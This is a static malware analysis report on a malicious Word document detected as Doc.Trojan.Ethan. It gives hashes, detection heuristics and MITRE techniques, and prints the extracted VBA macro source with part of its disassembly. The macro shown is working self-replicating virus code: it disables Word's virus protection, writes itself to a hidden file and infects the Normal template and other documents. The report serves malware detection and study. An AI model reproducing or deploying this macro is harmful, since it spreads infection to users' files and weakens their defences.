Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d34eb0ef33e05ff6…

MALICIOUS

Office (OLE)

35.0 KB Created: 2000-03-22 09:36:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7af9fe272ce09188050303bb3fb21e3c SHA-1: 23650cff3c676cbfcb34c5148c1c40e9e4049050 SHA-256: d34eb0ef33e05ff6e744c26f452452485ba467dc926599063092b19e45aa3014
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV, specifically as Doc.Trojan.Ethan-20. It contains VBA macros that attempt to write a file to disk and potentially download a second-stage payload. The macro code attempts to save itself to 'c:\_____.___' and also attempts to delete 'c:\class.sys' and 'c:\Brigl.sys'. The presence of VBA macros indicates a likely initial access vector via spearphishing attachment.

Heuristics 2

  • ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7948 bytes
SHA-256: 75cd96ab05b381ecdb8f99980e60254b1128d9b417845a6e246b9e681392b561
Detection
ClamAV: Doc.Trojan.Ethan-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next

Dim KillName$
KillName$ = "C:\class.sys"
If Dir(KillName) <> "" Then Kill KillName
If Dir("c:\Brigl.sys") <> "" Then Kill "c:\class.sys"

s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With

Randomize
If Dir("c:\_____.___", 6) = "" Then
    Open "c:\_____.___" For Output As #1
    For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
    Print #1, a
    Next i
    Close #1
    SetAttr "c:\_____.___", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
    Set t = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
    Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Else
    t = ""
End If

If t <> "" Then
    Open "c:\_____.___" For Input As #1
    If LOF(1) = 0 Then GoTo q
    i = 1
    Do While Not EOF(1)
        Line Input #1, a
        t.CodeModule.InsertLines i, a
        i = i + 1
    Loop
q:
Close #1
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Ethan Frome": .Author = "EW/LN/CB": .Keywords = "Ethan": .Execute: End With
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
Private Sub CommandButton1_Click()
On Error Resume Next
If MsgBox("Send form to Personnel?", vbOKCancel, Timesheet) = vbOK Then
    MsgBox "Please remember to type ""Personnel UK"" in the to field of the mail message which will appear next"
    SendForm
ActiveDocument.Close (wdDoNotSaveChanges)
End If
End Sub

Private Sub CommandButton2_Click()
SaveDoc
End Sub

Private Sub Document_New()

End Sub

' Processing file: /opt/analyzer/scan_staging/41b218edc16c4204ae35ac53f1a4bc32.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4439 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' Line #3:
' 	Dim 
' 	VarDefn KillName
' Line #4:
' 	LitStr 0x000C "C:\class.sys"
' 	St KillName$ 
' Line #5:
' 	Ld KillName 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld KillName 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #6:
' 	LitStr 0x000C "c:\Brigl.sys"
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000C "c:\class.sys"
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #7:
' Line #8:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St s 
' Line #9:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #10:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #11:
' Line #12:
' 	ArgsCall Read 0x0000 
' Line #13:
' 	LitStr 0x000C "c:\_____.___"
' 	LitDI2 0x0006 
' 	ArgsLd Dir 0x0002 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #14:
' 	LitStr 0x000C "c:\_____.___"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #15:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #16:
' 	Ld i 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.